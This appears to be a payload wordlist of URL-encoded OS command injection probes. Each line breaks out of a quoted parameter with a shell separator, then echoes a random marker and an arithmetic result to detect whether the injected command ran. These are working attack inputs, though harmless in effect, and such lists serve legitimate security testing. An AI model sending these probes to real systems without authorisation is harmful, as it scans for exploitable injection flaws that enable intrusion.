'%26echo%20IECZZA$((76%2B1))$(echo%20IECZZA)IECZZA%26
'%26%26echo%20WRWTAS$((61%2B67))$(echo%20WRWTAS)WRWTAS%26
'%7Cecho%20VBTZIY$((45%2B53))$(echo%20VBTZIY)VBTZIY%26
'%7C%7Cecho%20QOWWZU$((31%2B94))$(echo%20QOWWZU)QOWWZU%26
'echo%20NIXAXB$((47%2B23))$(echo%20NIXAXB)NIXAXB%7C
'%20echo%20MIVIHV$((7%2B58))$(echo%20MIVIHV)MIVIHV%7C
';echo%20CYLOAT$((50%2B30))$(echo%20CYLOAT)CYLOAT%7C
'&echo%20WHTJDF$((87%2B5))$(echo%20WHTJDF)WHTJDF%7C
'|echo%20DTSQRM$((82%2B33))$(echo%20DTSQRM)DTSQRM%7C
'||echo%20SPFQXR$((54%2B70))$(echo%20SPFQXR)SPFQXR%7C
'&&echo%20TQZUUM$((43%2B5))$(echo%20TQZUUM)TQZUUM%7C
'%0aecho%20LRJXVV$((74%2B11))$(echo%20LRJXVV)LRJXVV%7C
'%3Becho%20QGYQUP$((35%2B73))$(echo%20QGYQUP)QGYQUP%7C
'%26echo%20SYNXTK$((0%2B99))$(echo%20SYNXTK)SYNXTK%7C
'%26%26echo%20MIQKPQ$((80%2B18))$(echo%20MIQKPQ)MIQKPQ%7C
'%7Cecho%20HKFPKH$((65%2B16))$(echo%20HKFPKH)HKFPKH%7C
'%7C%7Cecho%20FUFIPG$((27%2B62))$(echo%20FUFIPG)FUFIPG%7C
"echo%20UFAGYK$((82%2B39))$(echo%20UFAGYK)UFAGYK
"%20echo%20IXTSZA$((19%2B14))$(echo%20IXTSZA)IXTSZA
";echo%20BJMUOS$((51%2B32))$(echo%20BJMUOS)BJMUOS
"&echo%20CYVXHL$((2%2B25))$(echo%20CYVXHL)CYVXHL
"|echo%20JFFFCK$((98%2B39))$(echo%20JFFFCK)JFFFCK
"||echo%20JZKWAX$((82%2B62))$(echo%20JZKWAX)JZKWAX
"&&echo%20PFNZYT$((53%2B30))$(echo%20PFNZYT)PFNZYT
"%0aecho%20CJDAVC$((37%2B56))$(echo%20CJDAVC)CJDAVC
"%3Becho%20XKMIXJ$((55%2B55))$(echo%20XKMIXJ)XKMIXJ
"%26echo%20XPABSL$((91%2B48))$(echo%20XPABSL)XPABSL
"%26%26echo%20MSODXX$((98%2B77))$(echo%20MSODXX)MSODXX
"%7Cecho%20NIUSSD$((14%2B80))$(echo%20NIUSSD)NIUSSD
"%7C%7Cecho%20ZXHQBT$((34%2B29))$(echo%20ZXHQBT)ZXHQBT
"echo%20LROQVJ$((59%2B51))$(echo%20LROQVJ)LROQVJ'
"%20echo%20AWPUDF$((45%2B83))$(echo%20AWPUDF)AWPUDF'
";echo%20DHCQNM$((60%2B94))$(echo%20DHCQNM)DHCQNM'
"&echo%20AMSBLU$((47%2B94))$(echo%20AMSBLU)AMSBLU'
"|echo%20DKGJRP$((17%2B97))$(echo%20DKGJRP)DKGJRP'
"||echo%20TABSEM$((52%2B6))$(echo%20TABSEM)TABSEM'
"&&echo%20YPKEUZ$((26%2B62))$(echo%20YPKEUZ)YPKEUZ'
"%0aecho%20UIFJEM$((39%2B5))$(echo%20UIFJEM)UIFJEM'
"%3Becho%20RBDSUF$((59%2B65))$(echo%20RBDSUF)RBDSUF'
"%26echo%20HKWALZ$((5%2B31))$(echo%20HKWALZ)HKWALZ'
"%26%26echo%20XHYRUC$((45%2B24))$(echo%20XHYRUC)XHYRUC'
"%7Cecho%20JZTYDR$((14%2B40))$(echo%20JZTYDR)JZTYDR'
"%7C%7Cecho%20BOMIAP$((85%2B40))$(echo%20BOMIAP)BOMIAP'
"echo%20UEUAGM$((11%2B22))$(echo%20UEUAGM)UEUAGM"
"%20echo%20IWYYYV$((59%2B47))$(echo%20IWYYYV)IWYYYV"
";echo%20NUURLG$((10%2B93))$(echo%20NUURLG)NUURLG"
"&echo%20DTXNAY$((11%2B40))$(echo%20DTXNAY)DTXNAY"
"|echo%20UPRLNQ$((23%2B4))$(echo%20UPRLNQ)UPRLNQ"
"||echo%20VKPFAP$((92%2B94))$(echo%20VKPFAP)VKPFAP"
"&&echo%20KWPRCS$((3%2B21))$(echo%20KWPRCS)KWPRCS"
"%0aecho%20MJVQYB$((44%2B28))$(echo%20MJVQYB)MJVQYB"
"%3Becho%20TMWMCT$((51%2B35))$(echo%20TMWMCT)TMWMCT"
"%26echo%20HCCVWB$((30%2B94))$(echo%20HCCVWB)HCCVWB"
"%26%26echo%20GEOQBM$((28%2B12))$(echo%20GEOQBM)GEOQBM"
"%7Cecho%20FCZDSM$((68%2B91))$(echo%20FCZDSM)FCZDSM"
"%7C%7Cecho%20HTPEMJ$((2%2B19))$(echo%20HTPEMJ)HTPEMJ"
"echo%20OQTVEH$((73%2B9))$(echo%20OQTVEH)OQTVEH
"%20echo%20QIOHVO$((71%2B18))$(echo%20QIOHVO)QIOHVO
";echo%20HIENCF$((0%2B66))$(echo%20HIENCF)HIENCF
"&echo%20IBIYQC$((4%2B38))$(echo%20IBIYQC)IBIYQC
"|echo%20FOBRPZ$((91%2B99))$(echo%20FOBRPZ)FOBRPZ
"||echo%20KVIAFY$((17%2B57))$(echo%20KVIAFY)KVIAFY
"&&echo%20IQZTQY$((96%2B36))$(echo%20IQZTQY)IQZTQY
"%0aecho%20PNFTTQ$((20%2B65))$(echo%20PNFTTQ)PNFTTQ
"%3Becho%20PDMNTI$((23%2B51))$(echo%20PDMNTI)PDMNTI
"%26echo%20QKCGPP$((73%2B25))$(echo%20QKCGPP)QKCGPP
"%26%26echo%20IJQIDW$((5%2B53))$(echo%20IJQIDW)IJQIDW
"%7Cecho%20ZIYCEF$((9%2B56))$(echo%20ZIYCEF)ZIYCEF
"%7C%7Cecho%20OMOFYD$((86%2B53))$(echo%20OMOFYD)OMOFYD
"echo%20SRQCVS$((48%2B38))$(echo%20SRQCVS)SRQCVS//
"%20echo%20BYNNOQ$((5%2B9))$(echo%20BYNNOQ)BYNNOQ//
";echo%20OFZRPB$((30%2B95))$(echo%20OFZRPB)OFZRPB//
"&echo%20QZCVQA$((19%2B81))$(echo%20QZCVQA)QZCVQA//
"|echo%20XLPJUH$((63%2B35))$(echo%20XLPJUH)XLPJUH//
"||echo%20GIRCRN$((15%2B16))$(echo%20GIRCRN)GIRCRN//
"&&echo%20KXEBPS$((55%2B92))$(echo%20KXEBPS)KXEBPS//
"%0aecho%20JCEFAY$((97%2B37))$(echo%20JCEFAY)JCEFAY//
"%3Becho%20MDSQTA$((24%2B10))$(echo%20MDSQTA)MDSQTA//
"%26echo%20AIKVYL$((27%2B44))$(echo%20AIKVYL)AIKVYL//
"%26%26echo%20YUQTKP$((71%2B23))$(echo%20YUQTKP)YUQTKP//
"%7Cecho%20GPGSXE$((20%2B85))$(echo%20GPGSXE)GPGSXE//
"%7C%7Cecho%20JDTYJX$((18%2B24))$(echo%20JDTYJX)JDTYJX//
"echo%20UWNJQE$((91%2B46))$(echo%20UWNJQE)UWNJQE\
"%20echo%20TZZNSL$((92%2B66))$(echo%20TZZNSL)TZZNSL\
";echo%20IJTGYU$((36%2B47))$(echo%20IJTGYU)IJTGYU\
"&echo%20TRMPTD$((48%2B23))$(echo%20TRMPTD)TRMPTD\
"|echo%20EEOGHF$((87%2B30))$(echo%20EEOGHF)EEOGHF\
"||echo%20EXJSNR$((49%2B13))$(echo%20EXJSNR)EXJSNR\
"&&echo%20PMIRHD$((95%2B94))$(echo%20PMIRHD)PMIRHD\
"%0aecho%20PZDPMF$((67%2B92))$(echo%20PZDPMF)PZDPMF\
"%3Becho%20OFKRSW$((4%2B25))$(echo%20OFKRSW)OFKRSW\
"%26echo%20MBGKIN$((22%2B60))$(echo%20MBGKIN)MBGKIN\
"%26%26echo%20FGFIOR$((55%2B25))$(echo%20FGFIOR)FGFIOR\
"%7Cecho%20XTLLDX$((25%2B20))$(echo%20XTLLDX)XTLLDX\
"%7C%7Cecho%20HKHVFC$((85%2B7))$(echo%20HKHVFC)HKHVFC\
"echo%20TPIIXD$((67%2B79))$(echo%20TPIIXD)TPIIXD&
"%20echo%20FEKBSB$((80%2B66))$(echo%20FEKBSB)FEKBSB&
";echo%20DNJXZB$((38%2B82))$(echo%20DNJXZB)DNJXZB&
"&echo%20JNXUVW$((81%2B20))$(echo%20JNXUVW)JNXUVW&
"|echo%20BKRUJQ$((5%2B96))$(echo%20BKRUJQ)BKRUJQ&
"||echo%20TNFYTM$((72%2B96))$(echo%20TNFYTM)TNFYTM&
"&&echo%20AEAXJF$((73%2B78))$(echo%20AEAXJF)AEAXJF&
"%0aecho%20DDWDPN$((91%2B29))$(echo%20DDWDPN)DDWDPN&
"%3Becho%20UZGZPC$((74%2B69))$(echo%20UZGZPC)UZGZPC&
"%26echo%20CXIGLR$((26%2B78))$(echo%20CXIGLR)CXIGLR&
"%26%26echo%20EXRBWP$((2%2B65))$(echo%20EXRBWP)EXRBWP&
"%7Cecho%20ZOFKJO$((5%2B82))$(echo%20ZOFKJO)ZOFKJO&
"%7C%7Cecho%20CTTIVX$((65%2B14))$(echo%20CTTIVX)CTTIVX&
"echo%20NMPYVC$((95%2B49))$(echo%20NMPYVC)NMPYVC|
"%20echo%20CTFTCJ$((80%2B91))$(echo%20CTFTCJ)CTFTCJ|
";echo%20QBISFH$((85%2B18))$(echo%20QBISFH)QBISFH|
"&echo%20CCWSNS$((52%2B72))$(echo%20CCWSNS)CCWSNS|
"|echo%20IIWZTV$((37%2B92))$(echo%20IIWZTV)IIWZTV|
"||echo%20DKOIIU$((52%2B39))$(echo%20DKOIIU)DKOIIU|
"&&echo%20ELGGDQ$((2%2B5))$(echo%20ELGGDQ)ELGGDQ|
"%0aecho%20QBFOYY$((28%2B31))$(echo%20QBFOYY)QBFOYY|
"%3Becho%20QATQCM$((57%2B7))$(echo%20QATQCM)QATQCM|
"%26echo%20XKUYPF$((60%2B61))$(echo%20XKUYPF)XKUYPF|
"%26%26echo%20DBNQDD$((96%2B50))$(echo%20DBNQDD)DBNQDD|
"%7Cecho%20BAERUM$((15%2B78))$(echo%20BAERUM)BAERUM|
"%7C%7Cecho%20FFARMZ$((95%2B61))$(echo%20FFARMZ)FFARMZ|
"echo%20MJEJVE$((54%2B9))$(echo%20MJEJVE)MJEJVE%27
"%20echo%20LRNMXI$((82%2B72))$(echo%20LRNMXI)LRNMXI%27
";echo%20QNIOIG$((45%2B76))$(echo%20QNIOIG)QNIOIG%27
"&echo%20TFMDGN$((33%2B82))$(echo%20TFMDGN)TFMDGN%27
"|echo%20CCTRQP$((48%2B16))$(echo%20CCTRQP)CCTRQP%27
"||echo%20SAHVEF$((53%2B99))$(echo%20SAHVEF)SAHVEF%27
"&&echo%20SKQWDW$((71%2B38))$(echo%20SKQWDW)SKQWDW%27
"%0aecho%20LFVTXU$((70%2B65))$(echo%20LFVTXU)LFVTXU%27
"%3Becho%20KRGULU$((96%2B71))$(echo%20KRGULU)KRGULU%27
"%26echo%20WHBQCR$((5%2B15))$(echo%20WHBQCR)WHBQCR%27
"%26%26echo%20NUMBRK$((29%2B87))$(echo%20NUMBRK)NUMBRK%27
"%7Cecho%20NGISBI$((50%2B27))$(echo%20NGISBI)NGISBI%27
"%7C%7Cecho%20OESDWI$((60%2B61))$(echo%20OESDWI)OESDWI%27
"echo%20XFGDCC$((53%2B64))$(echo%20XFGDCC)XFGDCC%22
"%20echo%20BZQFLS$((30%2B41))$(echo%20BZQFLS)BZQFLS%22
";echo%20KGVZYK$((88%2B50))$(echo%20KGVZYK)KGVZYK%22
"&echo%20ILAWBP$((7%2B21))$(echo%20ILAWBP)ILAWBP%22
"|echo%20LYYMLJ$((68%2B90))$(echo%20LYYMLJ)LYYMLJ%22
"||echo%20RJZLGG$((1%2B14))$(echo%20RJZLGG)RJZLGG%22
"&&echo%20IWMDND$((49%2B2))$(echo%20IWMDND)IWMDND%22
"%0aecho%20ZRDUWP$((33%2B75))$(echo%20ZRDUWP)ZRDUWP%22
"%3Becho%20MMYKAT$((11%2B87))$(echo%20MMYKAT)MMYKAT%22
